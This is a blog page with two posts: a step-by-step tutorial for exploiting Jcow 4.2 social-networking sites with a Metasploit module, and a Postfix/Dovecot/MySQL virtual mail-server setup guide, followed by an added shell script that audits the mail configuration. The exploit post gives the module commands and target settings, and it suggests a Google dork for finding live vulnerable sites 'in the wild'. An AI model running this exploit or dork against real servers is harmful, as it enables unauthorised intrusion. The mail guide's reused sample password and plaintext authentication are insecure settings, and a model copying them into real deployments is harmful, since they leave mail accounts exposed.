Friday, September 16, 2011

Hacking Jcow Webserver Social Networking

Have you ever seen this CMS? It is called Jcow, a free web-based application for building social networking sites. It is available from their website, jcow.net, and the download is fairly small: only 777KB, well under 1 MB.
What I will discuss here is not how to use Jcow as a friendship site, but a vulnerability in some versions of Jcow that turns out to be exploitable in just 4 steps. The intruder can even see the contents of the victim web server's directories (if the server has not implemented good security).
In the example below, the victim's IP is 192.168.8.94.
It is much better to learn in a virtual lab first, but if you are curious to go straight into the wild, you can also search with the Google dork "Powered by Jcow 4.2.0". If you want to go directly to the real world, you also have to learn the logic of attack techniques over the internet ( click here ).
OS Attacker: BT 5 R1
Victim OS: XP SP3
Vulnerable applications: Jcow 4.2
As set up in my previous article, the target Jcow application has an account with the username "victim" and the password "victim".
Okay, let's go step by step.
Requirements:
1. Metasploit Framework (metasploit.com)
2. jcow.rb exploit script ( MediaFire link on the original website )
The steps:
1. Copy the downloaded jcow.rb exploit file into the folder /pentest/exploits/framework/modules/exploits/remote/
cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/
If you are unsure how to copy an exploit .rb file into BackTrack Linux, you can see the tutorial here.
2. Open the Metasploit console by typing msfconsole in a terminal, then select the exploit we copied earlier.
msf > use exploit/remote/jcow
3. Next, run the show options command to see which options this exploit accepts, then set them.

msf exploit(jcow) > set rhost 192.168.8.94    -> target IP
rhost => 192.168.8.94
msf exploit(jcow) > set username victim       -> sets the username
username => victim
msf exploit(jcow) > set password victim       -> sets the password
password => victim
4. Once everything is configured properly, the last step is to run the exploit command in the Metasploit console.

Success.
Security:
1. Upgrade to the latest version of Jcow

Create a Virtual Domain Mail Server in Ubuntu


This time we will create a mail server on Ubuntu 9.10.

The main weapons: apache2, mysql, postfix, dovecot, squirrelmail :)
Postfix is a mail-sending program that replaces sendmail.
Postfix is a free and open-source mail transfer agent (MTA) that routes and delivers electronic mail.
It is intended as a fast, easier-to-administer, and secure alternative to the widely-used Sendmail MTA. ( wiki )
Dovecot is an open source IMAP and POP3 server for Linux / UNIX-like systems, written primarily with security in mind. Developed by Timo Sirainen, Dovecot was first released in July 2002. Dovecot primarily aims to be a lightweight, fast and easy to set up open source mailserver. ( wiki )
1. Prepare the Ubuntu 9.10 system
To avoid build problems later, first install build-essential on the Ubuntu system.
sudo apt-get install build-essential

2. Install the main packages

sudo apt-get install postfix postfix-mysql php5-imap dovecot-pop3d dovecot-imapd apache2 php5-mysql squirrelmail

3. Check whether apache2, postfix and dovecot are already present on the system

service apache2 status && service postfix status && service dovecot status

4. Create the database for Postfix

 root@kaitokid:~# mysql -u root -p      // -p: enter the MySQL password when prompted
 mysql> create database postfix;
 mysql> grant all privileges on postfix.* to 'postfix'@'localhost' identified by 'postfixpassword';
 mysql> grant all privileges on postfix.* to 'postfix'@'127.0.0.1' identified by 'postfixpassword';
 mysql> exit
 // Replace 'postfixpassword' with the password you want, and 'postfix' with the user name you chose

5. Download postfixadmin to simplify the administration of mail

 http://sourceforge.net/projects/postfixadmin/ 

6. Extract the downloaded postfixadmin archive and move it to /var/www

 root@kaitokid:~# cd /var/www/
 root@kaitokid:/var/www# tar xzf /home/kaitokid/postfixadmin-2.**.tar.gz
 root@kaitokid:/var/www# mv postfixadmin-2.** postfix
 root@kaitokid:/var/www# chown -R www-data.www-data /var/www

7. Set up postfixadmin's config.inc.php

 root@kaitokid:~# nano /var/www/postfix/config.inc.php
    // Database Config
    // mysql = MySQL 3.23 and 4.0
    // mysqli = MySQL 4.1
    // pgsql = PostgreSQL
    $CONF['database_type'] = 'mysqli';              // match your MySQL version; for series 4 and above use mysqli
    $CONF['database_host'] = 'localhost';
    $CONF['database_user'] = 'postfix';             // MySQL database user, see step 4
    $CONF['database_password'] = 'postfixpassword'; // MySQL database password, see step 4
    $CONF['database_name'] = 'postfix';
    $CONF['database_prefix'] = '';                  // default is empty

8. Set up postfixadmin

Open your web browser (Firefox) and go to the URL
http://127.0.0.1/postfix/setup.php
// Make sure no errors appear during installation; for postfixadmin series 2.3 the setup file does not need to be removed
// Make sure the web server on the computer is already running

9. MySQL Postfix configuration

// Set user and password to match step 4
 nano /etc/postfix/mysql_virtual_alias_maps.cf
    user = postfix
    password = postfixpassword
    hosts = 127.0.0.1
    dbname = postfix
    table = alias
    select_field = goto
    where_field = address

 nano /etc/postfix/mysql_virtual_mailbox_maps.cf
    user = postfix
    password = postfixpassword
    hosts = 127.0.0.1
    dbname = postfix
    table = mailbox
    select_field = maildir
    where_field = username
    # additional_conditions = and active = '1'

 nano /etc/postfix/mysql_virtual_mailbox_limit_maps.cf
    user = postfix
    password = postfixpassword
    hosts = 127.0.0.1
    dbname = postfix
    table = mailbox
    select_field = quota
    where_field = username
    # additional_conditions = and active = '1'

 nano /etc/postfix/mysql_virtual_domains_maps.cf
    user = postfix
    password = postfixpassword
    hosts = 127.0.0.1
    dbname = postfix
    table = domain
    select_field = domain
    where_field = domain
    # additional_conditions = and backupmx = '0' and active = '1'

 nano /etc/postfix/mysql_relay_domains_maps.cf
    user = postfix
    password = postfixpassword
    hosts = 127.0.0.1
    dbname = postfix
    table = domain
    select_field = domain
    where_field = domain
    # additional_conditions = and backupmx = '1'

 chgrp postfix /etc/postfix/mysql_*.cf
 chmod 640 /etc/postfix/mysql_*.cf
 groupadd -g 5000 vmail
 useradd -m -g vmail -u 5000 -d /home/vmail -s /bin/bash vmail

10. Postfix main.cf configuration

 nano /etc/postfix/main.cf
    # Virtual Mailbox Domains Settings
    # The rest of the default main.cf configuration waits for part 2 of this mail server tinkering

    # Adjust myhostname to the hostname of the computer used as the mail server
    myhostname = ubuntu
    virtual_alias_maps = mysql:/etc/postfix/mysql_virtual_alias_maps.cf
    virtual_mailbox_domains = mysql:/etc/postfix/mysql_virtual_domains_maps.cf
    virtual_mailbox_maps = mysql:/etc/postfix/mysql_virtual_mailbox_maps.cf
    virtual_mailbox_limit = 51200000
    virtual_uid_maps = static:5000
    virtual_gid_maps = static:5000
    virtual_mailbox_base = /home/vmail
    virtual_transport = virtual

    # Additional for quota support (these parameters come from the VDA quota patch, not stock Postfix)
    virtual_create_maildirsize = yes
    virtual_mailbox_extended = yes
    virtual_mailbox_limit_maps = mysql:/etc/postfix/mysql_virtual_mailbox_limit_maps.cf
    virtual_mailbox_limit_override = yes
    virtual_maildir_limit_message = Sorry, the maildir has overdrawn your diskspace your quota, please free up some of spaces of your mailbox try again.
    virtual_overquota_bounce = yes
    alias_maps = hash:/etc/aliases
    alias_database = hash:/etc/aliases
    mydestination =
    relayhost =
    mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
    mailbox_size_limit = 0
    recipient_delimiter = +
    inet_interfaces = all

11. Configuring Dovecot POP3 and IMAP4

 nano /etc/dovecot/dovecot.conf
    protocols = imap pop3
    disable_plaintext_auth = no
    default_mail_env = maildir:/home/vmail/%u/
    first_valid_uid = 5000
    first_valid_gid = 5000
    # SQL database
    passdb sql {
      # Path for SQL configuration file
      args = /etc/dovecot/dovecot-sql.conf
    }
    # SQL database
    userdb sql {
      # Path for SQL configuration file
      args = /etc/dovecot/dovecot-sql.conf
    }

 nano /etc/dovecot/dovecot-sql.conf
    driver = mysql
    connect = host=127.0.0.1 dbname=postfix user=postfix password=postfixpassword
    default_pass_scheme = CRYPT
    user_query = SELECT maildir, 5000 AS uid, 5000 AS gid FROM mailbox WHERE username = '%u'
    password_query = SELECT password FROM mailbox WHERE username = '%u'

OK, that's it for now. Happy mailing and happy Ubuntu :)
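
A check for the files written in steps 4, 9 and 11, as an added example that is not part of the original post: it reports any mysql_*.cf lookup file that is readable by everyone (what the chmod 640 in step 9 prevents), any file still carrying the guide's sample password postfixpassword, and a dovecot.conf that leaves disable_plaintext_auth = no. The function names and finding labels are made up for this example.

```shell
#!/bin/sh
# Added example: audit the files written in steps 4, 9 and 11 of the guide.
# PLACEHOLDER is the sample password the guide uses everywhere.
PLACEHOLDER='postfixpassword'

# audit_maps DIR: inspect every DIR/mysql_*.cf lookup table.
audit_maps() {
    for f in "$1"/mysql_*.cf; do
        [ -f "$f" ] || continue
        # The first 10 characters of `ls -ld` are the mode string;
        # character 8 is the read bit for "other".
        mode=$(ls -ld "$f" | cut -c1-10)
        case $mode in
            ???????r??) echo "WORLD-READABLE $f" ;;
        esac
        # The MySQL password sits in clear text on the "password =" line.
        if grep -Eq "^[[:space:]]*password[[:space:]]*=[[:space:]]*$PLACEHOLDER[[:space:]]*\$" "$f"; then
            echo "SAMPLE-PASSWORD $f"
        fi
    done
    return 0
}

# audit_dovecot DOVECOT_CONF DOVECOT_SQL_CONF
audit_dovecot() {
    # "no" lets clients send the mailbox password over an unencrypted session.
    if grep -Eq '^[[:space:]]*disable_plaintext_auth[[:space:]]*=[[:space:]]*no[[:space:]]*$' "$1"; then
        echo "PLAINTEXT-AUTH $1"
    fi
    # The connect line repeats the database password from step 4.
    if grep -Eq "^[[:space:]]*connect[[:space:]]*=.*password=$PLACEHOLDER([[:space:]]|\$)" "$2"; then
        echo "SAMPLE-PASSWORD $2"
    fi
    return 0
}

# Check the live paths from the guide only when called as: sh audit.sh run
if [ "${1:-}" = run ]; then
    audit_maps /etc/postfix
    audit_dovecot /etc/dovecot/dovecot.conf /etc/dovecot/dovecot-sql.conf
fi
```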